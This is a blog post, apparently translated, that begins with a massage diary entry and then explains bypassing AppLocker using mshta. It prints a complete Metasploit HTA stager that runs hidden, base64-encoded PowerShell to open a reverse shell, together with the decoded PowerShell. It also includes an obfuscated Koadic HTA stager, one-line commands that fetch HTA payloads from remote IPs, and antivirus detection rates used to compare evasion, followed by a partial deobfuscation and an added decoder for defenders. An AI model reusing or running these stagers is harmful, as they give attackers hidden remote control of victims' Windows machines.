INTP Daily: bypassing AppLocker with mshta

Went for a Thai massage today, 60 minutes.

First a foot wash, then into a small cubicle curtained off with bath towels. The massage is done undressed, of course.

Hot towel compress.

Legs first: left leg, right leg, thighs; then the neck and the back, along both sides of the spine, which hurt a little.

Then flip over: arms and palms.

Finally the head.

An hour and it was over.

An hour goes by quickly; each area gets ten minutes or just a few.

The little room is quite dim, with soft music and birdsong. Very relaxing.

Tea is served before the massage, and at the end they brought out tremella (silver ear) congee.
Afterwards I smelled fragrant all over; the essential oils had really soaked in.

Bypassing AppLocker with mshta

mshta is short for Microsoft HTML Application. So what is an HTA?

Although an HTA is written in HTML, JS and CSS, it has far greater privileges than an ordinary web page: it has all the privileges of a desktop program (reading and writing files, manipulating the registry, and so on).

At the core of an HTA is the scripting supported by the IE engine, such as VBScript and JScript.

Metasploit mshta module

Running mshta http://192.168.1.4:9997/28XMcvsHw2HdDxZ.hta is enough to get a session with a single line.

<script language="VBScript">
window.moveTo -4000, -4000
Set gfsKwAVKmx = CreateObject("Wscript.Shell")
Set wVn = CreateObject("Scripting.FileSystemObject")
For each path in Split(gfsKwAVKmx.ExpandEnvironmentStrings("%PSModulePath%"),";")
If wVn.FileExists(path + "\..\powershell.exe") Then
gfsKwAVKmx.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIACcAJwArACcAJwA0AHMASQBBAEwAZABSAEwARwBJAEMAQQA3AFYAVwArADIALwBpAE8AQgB7ADEAfQArAC8AYQBUADkASAA2AEkAVgBFAGsARwBsAEUARQByAG8AUwAxAHIAcAAnACcAKwAnACcARQBwADcAJwAnACsAJwAnAHAARQBhAHsAMQB9AGsAUQBZAEYARgBKAHoAYwB4AHcAYwBXAEoAYQBlAEsAVQAwAHIAMwA5ADMAMgA4AE0AUwBSAC8AYQA5AG0ANwB2AHAAJwAnACsAJwAnAEkAMgBFAFMATwB4ADUAKwBaAHQAdgBaAHIAeABNAEkANAA4AFQARgBrAGwASgBWAC8AcgAyADYAVABjAHAAZQAwAFkAbwBSAHEARQBrAEYAegBaAEIAQQA1ACsAJwAnACsAJwAnAFcAcABjAEoAZABvADMAYgB0AGwAVgA3ADIAQwA1AGkAZABPAEcAUABwAGkAeQBUAFAAdABjADIAbQB4AFUASgBFAG8AcwBYAGwAWgBUAE8ATgBZAHgAegB4AHcAMwBlAGwAaQA3AG0AVwBKAHsAMQB9AGkAOABwAFEAUQBuAGMAawBuADYAUwA1AHEAcwBjAEkAeQBQAGgANwBkADMAMgBPAFAAUwBOADYAbgB3AFoANgBWAEwAMgBTADIAaQBtAGQAaQAnACcAKwAnACcAdQBpAGIAdwBWAGwAbwA2ADEAeQBCAGQANwBmAGUAWQBoAEUAVgB2AEYAMgBsAHsAMQB9AEMANQBlAEwAWAByADgAWABTAC8ATABpADIAcQBMAFQAdgBVADAAUQBUAHUAVwBqAHQARQBvADcAewAxAH0AaQBrADkAcABzAFMAUgA5AEwAdwBtAEgAOQBtADYAewAxAH0ANQBhAEo
ASgB2AEoAZwBsAGIATQBrAHIARQB4AEwAVgBUAHkAcABPAGwASwBBAGwASABvAEMAMQBCADIAeABpAHYAbQBKACsAVQBvAFQAVAB2AEoAdwBuAHgAagB5AE4AbwArAHgAWQB3AHMANQBCAFMAaQA3AEMANgB5AGgAbQBuAHUAYgA3AE0AVQA2AFMAWQBsAG0AYQBDAHcALwB6AHgAZQBKADMAZQBaADYANQBIADYAYwBSAEoAeQBHAHUARwBCAEgASABNAGQAdABZAE8ASAA0AGcASABrADQAcQBQAFIAVAA1AEYASQAvAHgAYwBnAEYAYQBGAG8AOQBKAEYAQwB4AEsASgBSAEIANwBZAEcAcwBzAEYANgBLAFUAMAByAEwAMABYADgAegBJAEEANwB6AE4AdwBmAHQAWgBKAGYAbQAxAEUAawBpAE4AZQBGAHcAcQBRADIATABmAE8ANgBqAEoALwBKAFQAaQBnACcAJwArACcAJwAyAHIAeABuAFUAZwBQACcAJwArACcAJwBiAEMAagBCADgAOAB3AEkAQQBQAEcANwB3ACcAJwArACcAJwBIAEcAWgAwACsAaAArAGQAUABZAE8AagAxADQAVwA4AG0AZQArADMAOABFAFEAdABUAHgAaQBDAGQAbgByAGYAcABHAFUAcwBtAFMAQwBlADgAUgBaAHYASQBQAFAAZwBoADIAbgB1AEwAUgA0AHgAaAB6AHkAMAAyADYAUAB5AHoAOQByAHIAWgBhAHIAZwB1AEwAVAAyAFEAaABXADUAaQA0AGoALwB1AEoARgAvAHcAMABIAEMAcgB1AHUATABtAFEAKwBKAG4AUQBMAEwAMABtAEUAVwA3AHMASQBoAGMAVABMAE8AUwB1AC8AbAB4ACcAJwArACcAJwBhADgAcABIAGcAUABTAEMAVQBYAEcAMABCADgAYwBqAEgAYgB3AEgANABMAFUAeAB3AGcATABuAEEAVwA3AFAAaABCAHIAUgAwAFMALwBxAHkAcgBwADQAVAA2AE8ATgBZADgAUwBHACcAJwArACcAJwAwAEMAVQBVAEgAVwBTADIAKwB7ADEAfQBPAGEAUgBPAEwAaABxAFIAaQBVAE0AQQA3AC8AQQBOAGQAQwAwAHMAbwBWAEoAdwBMAHAAMQBWAHgAeQA3ADMATAByADUAQgBxAE4AaQBrAEsARQBuAEsAMABpAGkARgBVAHYAWABLAGsAbwAnACcAKwAnACcAVQBSAHgAWAA1AFoAMABxAEsARQBaAEYAdABhAHkAdABuACsAdABmAGcAUwByAHAAbABTAFQAagB5AFUAOABOAHoAYwBvAHYAUQBXAHoAYwB4AHIAawAwAFUASgBqADEATQBQAHMAZwBvAEkAMgBOAFkARwBlAHcAUgBSAEEAVQBoAFoANgBoAEUAZgA2AHoAdQBMACcAJwArACcAJwBCAEwAbgAzADQAcgB0AHcATgBCAEcAbABVAHsAMQB9ACcAJwArACcAJwA5AGcANgBRAEgAUwBBAFMAcwBDAEIAbwBzAEwAcgBzAFEAUQA2AEoANABYAHAAWQBxAEYAdQBSAEYAdQBLAEEANQBCAFoAdAA4ACcAJwArACcAJwA1AE8AaABRAEYAMABDAGUAeQBLAHQAbQBUAEMAdwBYAFkATAA3ADQAZgBaADEANABLAEIAOQA0AEwAWABIAEoAQQBYAGsAVQBKAHkAYgBZAG8ANAAyAFgASgBKAFQARwBIAE4AaQBRAHcAQgBuAEwAOQByAHgAaAArADcAewAxAH0AOABpAG0ARwBhAE0AcwA5AFQASQBlAFgAbgBOADkAUgAwAFgAQgBWAEIANAA4AGwAVgBCACcAJwArACcAJwAwAFEAeQBnAFAAUgB3AHgAQgB5AGcANgBNAFEAdAAxAGwATwBCAFQAOQBkAEIAbwA1AE0ALwBWAEkAUgBsAHAAOABFAHgAYgBQAFkAdABnAGQ
AMAAxAHEAeABoAFoAKwBKAHYAdwBjAGMAMwBuAFUAOQAwAGcAdwA0AGcAbwBMAFQAYQArAFoAagBMAHEAZABjADQAMQBzAGcANgAxADMAUAB0AEEAOAAvADgAcgBIAEYAeABiAEkAWABiAHMAcQBiACcAJwArACcAJwA0ADYAMAAzAGoAVgBSAGQASABYAGwANgBZAG8ATgA3ADQANwBCAGoAYQA3AEIAcAA0AGIAVwBzADEAYwBlAFYAVQBhAHQAWAB0AFcAYQBKAGcAcgBaADkAaQBhAG0AMQA5AEsAZgB0AGkAYwBKAEUARgBWAFYAZQB6AGUASwAnACcAKwAnACcAVgBxACsAcgB3ADcAcQB5AEIAdgBDAG0AcABCAGEAcwBOAFgAOABRAGsAdQAxAGoASAA5ADYAaABvAHcAJwAnACsAJwAnADcANwB1AHAASABvAGkAawBIAGIAVgA4ADMAeAA3AGUAUwBrAE0ANQB2AFEAWABsAFgAdAByAEoAWQBUAGwAbABpAG4AMAAxAGEAMQBXAHIAMwB3AFUAYgBkAEIAZgBVADEAbgAvAGcAbABOAGsAVAB0AG0AZABzADgATAA5AFcAcgBWAE4AWAAxAHUATwA3AFcAQgA3AFIAdwBGAFIAKwBLAGMAOQB1AFQAaQBGAEUAMABlAGsANgBsADEAWAB1AHYAZgBhAGMARQBmAEgAWAA5AHoARwA0ADQAZgAvAEwAbwBaADIAUABRADYARwBCAHsAMQB9ADEAYwBiAGoAVABIAFMAKwBrADYAOQBtAGsAbwBmAFMAZgB2AE4AUgBzAEoAWQBFAFgAVABVADkATgB1ADUAMgBhAHoAWABWAHcAMgA2AFgAeAB6AE4ASgA3AHMAOABrAGcAdgB0ADMAcQBiAEUAaABuAGoAUQAzADQAQQBqAC8AMwBHAHYAaABDAFYAOQBwAFMAMAAxAG8AcwAzAFkATAB7ADEAfQA1AG8AWABoAGQAQgBzAHsAMQB9AHYAegA0AGUAdQBjADcAWQBNAGQAMABMAHgAMgBxADUAUQA2AHYAagA2ADcANQBWAHEAMQBzAE8AZAB6ADEAMwB1AGsATwB0AFQAbQBOAFEAMwAxAHcANwBOAFUAZAAxAFEANgBVAHgAZQB7ADEAfQBJADAAcAA3AHUANgBJAGIATgBxAHQAMwBvAHgAdQBYAHEAawBBADYAYQAxACsAbQB6AFYAZwBiAFAAVQBmAE4AcwBOADcAMgBMAFgAVQBzADkAZwBiADQASwBDAHoAUgBJAFoAMgBoAE0ANAB1ADEASwA3AHIATwAxADAAMgBkAEkATgBWADcAWAB4ADUAaABSADAAMwBmADMANQAzAFQAewAxAH0AZwArAG0AbwBsADUAewAxAH0AdgBiAG4AdQBNAGcASQA3AEEAMQAnACcAKwAnACcAdwBHAHMAOAAwAG0AcgBxAHEATwByAGEAOQBaAHYAQgBhAFQAdQBBAGcAUABYADcANgAyADYAZwB0AGUARQBOAHcAZQA5AGEAMAAyADMAVQBJAFcAdgBuADYASwBaAGEAbQA0AEYAdgBOAFkAcgBjAGsAMABBAHoAWQBNACsAcAB6AFYAaAA3AGcANgA3AFUAaAA2AG8AcgA4AHYANgBrAEoAagAzAE4ARwA0AEwAOQBHAHoAbwB4AEIAOAB2AFQANwBnAFAAawA1AHYAeAB4AGEAQgB1AHAAYQBVAC8AVgAvAGwAMAA3AEgAVwBqAE4AcwAvACcAJwArACcAJwBQACsAaABMAGcAaAAwAHgAegBBADcAewAxAH0ATgB3AGQAKwA2AFEAaQBOAGQAUABGAG8AVwAwAGMAUwBPADYAKwA2AGYAZgBDAHUAbgBqAHUAdQBPADgAbwB2AEIASABBADgAeABFAGMAYgBKAEMARgBLAGcATgBnAHkAbgB2AEwAeAAwAFcAZAA3AEoAQgBNADIASgBFAGEATQBnAHk
AMwBGAHYAVwBPAEkANAB3AGgAVABFAFAARgA0AEcAOABMAHsAMQB9AFYASwBtAFMAYwBtAG4AUgBoAEkATQBHAFEAUABvADAAOQBNAFkAcwBmAFkAeAAvAFQAZQBXADAAbAA2AEYAaQB5ADkAegBMADkAOAA2AGYASgB5AEIAaQBHAEsAYwB2AGYAVgBTAGgAOQBIAEEAVgArAFYAbABjAGUANgBvAHMAewAxAH0AVQBVAGgANABWAGQAVgAvAFEAUAAzACsAdQBKAHQAdgBzAFoARwBHAHIATABNAGIAZQBBAFoAagBNAE8ATgAwAGIAQgAzAHQAawBLAGMAbgB5AHIANABZAEsANwBqAGMAYwAyAHUAeQBIAFkASAAyAEUARwB6AGgAZQBRADEAZQBFAEwAbgAzAG8AVgBRAEkAOQBuAFQASAA2AEcAcgB2ADgAVwBNADkATQBlAEkAVQBkAGcARgBhAHsAMQB9AGsAOAAvAEYAMQBVAFkAdwBCAEEAdwBjADQAMwB1AHAAdwBNAFgAUQBmADMAMgBKAEsASwB3ADIAeABxACsAawBUAE4AWgB3AFYALwB7ADEAfQBuAC8AdwB0AGwAWAB0AGIAKwBZAGYAZQBuAGEASwBTAFUATQAyAHgAKwBXAEgAKwA3ADgARwBwAFUALwBUAEkAQQBKAG8AaAB3AGsATABOAGcAYwBGAEIAOAB1AE0AbQA4AGkAMABOAFcASgBhAC8AUwBDADUAbQBCAEcAbABoAG0AagA3AGoAaQB7ADEAfQAxAE4AKwBQAEkAQQBMADQAMwA1AHkALwBRADIAUQBYAEMAMwB2AFgAZwB3AEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQAnACcALAAnACcARAAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQByAHQAKAAkAHMAKQA7AA==",0
Exit For
End If
Next
window.close()
</script>

How the msf mshta module works

Decode the base64-encoded content inside it and you get the following.

You can see how the reverse shell works: VBScript calls PowerShell, and the obfuscated PowerShell spawns the reverse shell.

if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H''+''4sIALdRLGICA7VW+2/iOB{1}+/aT9H6IVEkGlEEroS1rp''+''Ep7''+''pEa{1}kQYFFJzcxwcWJaeKU0r39328MSR/a9m7vp''+''I2ESOx5+ZtvZrxMI48TFklJV/r26Tcpe0YoRqEkFzZBA5+''+''WpcJdo3btlV72C5idOGPpiyTPtc2mxUJEosXlZTONYxzxw3eli7mWJ{1}i8pQQnckn6S5qscIyPh7d32OPSN6nwZ6VL2S2imdi''+''uibwVlo61yBd7feYhEVvF2l{1}C5eLXr8XS/Li2qLTvU0QTuWjtEo7{1}ik9psSR9LwmH9m6{1}5aJJvJglbMkrExLVTypOlKAlHoC1B2xivmJ+UoTTvJwnxjyNo+xYws5BSi7C6yhmnub7MU6SYlmaCw/zxeJ3eZ65H6cRJyGuGBHHMdtYOH4gHk4qPRT5FI/xcgFaFo9JFCxKJRB7YGssF6KU0rL0X8zIA7zNwftZJfm1EkiNeFwqQ2LfO6jJ/JTig''+''2rxnUgP''+''bCjB88wIAPG7w''+''HGZ0+h+dPYOj14W8me+38EQtTxiCdnrfpGUsmSCe8RZvIPPgh2nuLR4xhzy026Pyz9rrZarguLT2QhW5i4j/uJF/w0HCruuLmQ+JnQLL0mEW7sIhcTLOSu/lx''+''a8pHgPSCUXG0B8cjHbwH4LUxwgLnAW7PhBrR0S/qyrp4T6ONY8SG''+''0CUUHWS2+{1}OaROLhqRiUMA7/ANdC0soVJwLp1Vxy73Lr5BqNikKEnK0iiFUvXKko''+''URxX5Z0qKEZFtaytn+tfgSrplSTjyU8NzcovQWzcxrk0UJj1MPsgoI2NYGewRRAUhZ6hEf6zuL''+''BLn34rtwNBGlU{1}''+''9g6QHSASsCBosLrsQQ6J4XpYqFuRFuKA5BZt8''+''5OhQF0CeyKtmTCwXYL74fZ14KB94LXHJAXkUJybYo42XJJTGHNiQwBnL9rxh+7{1}8imGaMs9TIeXnN9R0XBVB48lVB''+''0QygPRwxByg6MQt1lOBT9dBo5M/VIRlp8ExbPYtgd01qxhZ+Jvwcc3nU90gw4goLTa+ZjLqdc41sg613PtA8/8rHFxbIXbsqb''+''4603jVRdHXl6YoN747Bja7Bp4bWs1ceVUatXtWaJgrZ9iam19KfticJEFVVezeK''+''Vq+rw7qyBvCmpBasNX8Qku1jH96how''+''77upHoikHbV83x7eSkM5vQXlXtrJYTllin01a1Wr3wUbdBfU1n/glNkTtmds8L9WrVNX1uO7WB7RwFR+Kc9uTiFE0ek6l1XuvfacEfHX9zG44f/LoZ2PQ6GB{1}1cbjTHS+k69mkofSfvNRsJYEXTU9Nu52azXVw26XxzNJ7s8kgvt3qbEhnjQ34Aj/3GvhCV9pS01os3YL{1}5oXhdBs{1}vz4euc7YMd0Lx2q5Q6vj675Vq1sOdz13ukOtTmNQ31w7NUd1Q6Uxe{1}I0p7u6IbNqt3oxuXqkA6a1+mzVgbPUfNsN72LXUs9gb4KCzRIZ2hM4u1K7rO102dINV7Xx5hR03f353T{1
}g+mol5{1}vbnuMgI7A1''+''wGs80mrqqOra9ZvBaTuAgPX7626gteENwe9a023UIWvn6KZam4FvNYrck0AzYM+pzVh7g67Uh6or8v6kJj3NG4L9GzoxB8vT7gPk5vxxaBupaU/V/l07HWjNs/''+''P+hLgh0xzA7{1}Nwd+6QiNdPFoW0cSO6+6ffCunjuuO8ovBHA8xEcbJCFKgNgynvLx0Wd7JBM2JEaMgy3FvWOI4whTEPF4G8L{1}VKmScmnRhIMGQPo09MYsfYx/TeW0l6Fiy9zL986fJyBiGKcvfVSh9HAV+Vlce6os{1}UUh4VdV/QP3+uJtvsZGGrLMbeAZjMON0bB3tkKcnyr4YK7jcc2uyHYH2EGzheQ1eELn3oVQI9nTH6Grv8WM9MeIUdgFa{1}k8/F1UYwBAwc43upwMXQf32JKKw2xq+kTNZwV/{1}n/wtlXtb+YfenaKSUM2x+WH+78GpU/TIAJohwkLNgcFB8uMm8i0NWJa/SC5mBGlhmj7ji{1}1N+PIAL435y/Q2QXC3vXgwAAA{0}{0}'')-f''='',''D'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);
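As an added example (not from the original post and not Metasploit's code), the Node.js snippet below shows what a defender does with this chain: given process-creation command lines, it flags mshta.exe started with a remote URL and decodes the UTF-16LE base64 that PowerShell's -e / -EncodedCommand switch expects, so the script hidden behind the -e argument can be read. The event records and the encoded command are constructed for the example; the mshta URL is the one quoted in the post.

```javascript
// Added example, not from the original post and not Metasploit's code: a small
// triage helper for the chain shown above (mshta fetching a remote .hta, whose
// VBScript runs "powershell.exe -nop -w hidden -e <base64>"). Runs under Node.js.

// PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text; the switch
// may be abbreviated (-e, -ec, -enc, ...). Returns the decoded script, or null when
// the command line carries no encoded command.
function decodeEncodedCommand(cmdline) {
  const m = /(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+\/=]+)/i.exec(cmdline);
  if (!m) return null;
  return Buffer.from(m[1], "base64").toString("utf16le");
}

// Inspect one process-creation event. The checks mirror what the post's payloads
// do: mshta started with an http(s) URL, PowerShell with a hidden window, and
// PowerShell given an encoded command.
function triageCommandLine(image, cmdline) {
  const findings = [];
  const exe = image.toLowerCase();
  if (exe.endsWith("mshta.exe") && /https?:\/\//i.test(cmdline)) {
    findings.push("mshta launched with a remote URL");
  }
  if (exe.endsWith("powershell.exe")) {
    if (/\s-w(?:indowstyle)?\s+hidden\b/i.test(cmdline)) findings.push("powershell hidden window");
    const decoded = decodeEncodedCommand(cmdline);
    if (decoded !== null) findings.push("powershell encoded command: " + decoded);
  }
  return findings;
}

// Constructed sample events. The encoded command is a harmless script encoded the
// way PowerShell expects, so the decoder can be checked; the mshta URL is the one
// quoted in the post.
const sampleScript = "Write-Output 'constructed sample'";
const sampleEncoded = Buffer.from(sampleScript, "utf16le").toString("base64");
const constructedEvents = [
  { image: "C:\\Windows\\System32\\mshta.exe", cmdline: "mshta http://192.168.1.4:9997/28XMcvsHw2HdDxZ.hta" },
  { image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", cmdline: "powershell.exe -nop -w hidden -e " + sampleEncoded },
  { image: "C:\\Windows\\System32\\notepad.exe", cmdline: "notepad.exe notes.txt" },
];

// Run the checks over every event and keep the findings per image.
function triageAll(events) {
  return events.map((ev) => ({ image: ev.image, findings: triageCommandLine(ev.image, ev.cmdline) }));
}

for (const r of triageAll(constructedEvents)) console.log(r.image, r.findings);
```

The decoder only reads the argument; nothing is executed. In the post's sample the decoded text is itself another layer (a gzip stream in base64, rebuilt with a `-f` format trick), so in practice the same decode-and-inspect step is repeated until plain script text appears.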

Metasploit's AV evasion is not great.

https://www.virustotal.com/gui/file/93f2f86875690d47b753659f91695e0712941dfb4974587615e6fbc309ad2d12?nocache=1

You can see the detection rate is 29/57.

Among them, Microsoft flags it as TrojanDropper:VBS/PSRunner.G!MSR, which means it simply cannot be used: a default Windows install won't even run it.

Koadic module

mshta http://IP:9999/B90eE

https://antiscan.me/scan/new/result?id=EPk4YC8cGM2m

10/26

Among them, Windows 10 Defender: Clean

The payload content is as follows:

<html><head>
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
<script language="JScript">
window.moveTo(-1337, -2019);
window.blur();
window.resizeTo(2, 4);

try
{
window.onerror = function(sMsg, sUrl, sLine) { return false; }
window.onfocus = function() { window.blur(); }
}
catch (e){}

function iHyfgYezYdlzJuWYzBQW(ZbFtBLJFye,rtQiUDRJRxXHhgR){var SbmAhbduRlCByVh='';while(rtQiUDRJRxXHhgR.length<ZbFtBLJFye.length){rtQiUDRJRxXHhgR+=rtQiUDRJRxXHhgR;}
for(i=0+0-0;i<ZbFtBLJFye.length;i+=(2+0-0)){var VWPwvEASzGQLjUsH=String.fromCharCode(parseInt(ZbFtBLJFye.substr(i,2+0-0),16+0-0)^rtQiUDRJRxXHhgR.charCodeAt(i/(2+0-0)));SbmAhbduRlCByVh=SbmAhbduRlCByVh+VWPwvEASzGQLjUsH;}
return SbmAhbduRlCByVh;}
var SHSzCQGBJVzghugTWn="xGiUpcNKgRznTmrzmwTxXUTIcKeVaTKlLdqoYXUZjSXBqHqekssmTNvXiaKJkjyCHryIvJwJxLwncWQhnEFVNuUQiNbExxNoVxonC";
var yGttXEzDktKBo="EYVnHFoyIMMyNBKPNOygbgTQbtinuAqeAMOzURnXfBkJxlFMWVJUIUaiqHbIPLLhkKMWJXRiVOYBibfrPoXVOkTTnEmRWbclNJsmzWppJFWJgQSdctdPVK";
var shQIRVqJzbCLRgzHXt="vZmEJAmYdbGdBhZwvxoVAiyKgRkPHtWkqSlMIrTgsVIxKbEaSgJEAnDNHZiJVvajHgWPTcJcJRcQwveoElsCObfVfOSBvAHld";
var yVqyQhWNIgBKd="ADNuJzwGEEzQIvYwjSCKNcJhIiHyjnguXOjxFLCPVXuONOUtylGabwSPkwMJobTfIUsZWeRKBEkIUQIiFBflWsfcUhuJikZibKHuqWHIYFIp";
var lFhVDQaCJXqiUOBj=[String.fromCharCode(SHSzCQGBJVzghugTWn.length),String.fromCharCode(yGttXEzDktKBo.length),String.fromCharCode(shQIRVqJzbCLRgzHXt.length),String.fromCharCode(yVqyQhWNIgBKd.length)];
var LwlLkzJLYDYcZQ=this[lFhVDQaCJXqiUOBj[0+0-0]+lFhVDQaCJXqiUOBj[1+0-0]+lFhVDQaCJXqiUOBj[2+0-0]+lFhVDQaCJXqiUOBj[3+0-0]];
LwlLkzJLYDYcZQ(iHyfgYezYdlzJuWYzBQW('...','6u2IZ64ql0GaOVGPp2'));
</script>
</head><body><hta:application caption="no" windowstate="minimize" showintaskbar="no" scroll="no" navigable="no">
<!-- -->



</hta:application></body></html>

Let's take the obfuscated JScript above apart.

First statement

var SHSzCQGBJVzghugTWn="xGiUpcNKgRznTmrzmwTxXUTIcKeVaTKlLdqoYXUZjSXBqHqekssmTNvXiaKJkjyCHryIvJwJxLwncWQhnEFVNuUQiNbExxNoVxonC";
var yGttXEzDktKBo="EYVnHFoyIMMyNBKPNOygbgTQbtinuAqeAMOzURnXfBkJxlFMWVJUIUaiqHbIPLLhkKMWJXRiVOYBibfrPoXVOkTTnEmRWbclNJsmzWppJFWJgQSdctdPVK";
var shQIRVqJzbCLRgzHXt="vZmEJAmYdbGdBhZwvxoVAiyKgRkPHtWkqSlMIrTgsVIxKbEaSgJEAnDNHZiJVvajHgWPTcJcJRcQwveoElsCObfVfOSBvAHld";
var yVqyQhWNIgBKd="ADNuJzwGEEzQIvYwjSCKNcJhIiHyjnguXOjxFLCPVXuONOUtylGabwSPkwMJobTfIUsZWeRKBEkIUQIiFBflWsfcUhuJikZibKHuqWHIYFIp";

Four variables are defined:

The string SHSzCQGBJVzghugTWn has length 101
The string yGttXEzDktKBo has length 118
The string shQIRVqJzbCLRgzHXt has length 97
The string yVqyQhWNIgBKd has length 108

JavaScript's fromCharCode() method converts a Unicode code to a character:

var n = String.fromCharCode(65);

n outputs:

A

var lFhVDQaCJXqiUOBj=[String.fromCharCode(SHSzCQGBJVzghugTWn.length),String.fromCharCode(yGttXEzDktKBo.length),String.fromCharCode(shQIRVqJzbCLRgzHXt.length),String.fromCharCode(yVqyQhWNIgBKd.length)];

So the line above is equivalent to

var lFhVDQaCJXqiUOBj=[String.fromCharCode(101),String.fromCharCode(118),String.fromCharCode(97),String.fromCharCode(108)];

String.fromCharCode(101) = e

String.fromCharCode(118) = v

String.fromCharCode(97) = a

String.fromCharCode(108) = l

That is, eval:

var lFhVDQaCJXqiUOBj = ['e', 'v', 'a', 'l'];

Second statement

var LwlLkzJLYDYcZQ=this[lFhVDQaCJXqiUOBj[0+0-0]+lFhVDQaCJXqiUOBj[1+0-0]+lFhVDQaCJXqiUOBj[2+0-0]+lFhVDQaCJXqiUOBj[3+0-0]];

This statement uses the variable lFhVDQaCJXqiUOBj, taking array elements 0, 1, 2 and 3 in turn:

var LwlLkzJLYDYcZQ = this['e' + 'v' + 'a' + 'l'];

Third statement

LwlLkzJLYDYcZQ(iHyfgYezYdlzJuWYzBQW('xx','6u2IZ64ql0GaOVGPp2'));

But in JavaScript `this` is not fixed; it changes with the execution context.

So my guess is that LwlLkzJLYDYcZQ stands for eval, and the third statement is therefore

eval(functionName('param1', 'param2'))

Fourth statement

function iHyfgYezYdlzJuWYzBQW(ZbFtBLJFye,rtQiUDRJRxXHhgR)
{var SbmAhbduRlCByVh='';
while(rtQiUDRJRxXHhgR.length<ZbFtBLJFye.length){rtQiUDRJRxXHhgR+=rtQiUDRJRxXHhgR;}
for(i=0+0-0;i<ZbFtBLJFye.length;i+=(2+0-0))
{var VWPwvEASzGQLjUsH=String.fromCharCode(parseInt(ZbFtBLJFye.substr(i,2+0-0),16+0-0)^rtQiUDRJRxXHhgR.charCodeAt(i/(2+0-0)));SbmAhbduRlCByVh=SbmAhbduRlCByVh+VWPwvEASzGQLjUsH;}
return SbmAhbduRlCByVh;}

Rewritten, the pseudocode is as follows:

function iHyfgYezYdlzJuWYzBQW(param1, param2)
{
var result = '';

while (param2.length < param1.length) {
// while (18 < 25518)
// param2 is the key of the XOR encryption
param2 += param2;
}
// The purpose of this step is to grow the XOR key until it is longer than the plaintext. As long as the key is the same length as the data, this kind of XOR encryption is theoretically unbreakable.
for (var i = 0; i < param1.length; i += 2)
// for (i = 0; i < 25518; i += 2)
{
var VWPwvEASzGQLjUsH = String.fromCharCode(parseInt(param1.substr(i, 2), 16) ^ param2.charCodeAt(i / 2));
result = result + VWPwvEASzGQLjUsH;
}
return result;
}

The key line is var VWPwvEASzGQLjUsH=String.fromCharCode(parseInt(param1.substr(i,2),16)^param2.charCodeAt(i/2));

parseInt(param1.substr(i,2),16) means: take the value of param1.substr(i,2) as hexadecimal and convert it to decimal.

substr(i,2) means: take 2 characters from param1 starting at index i.

Alright, by this point I'm already confused.
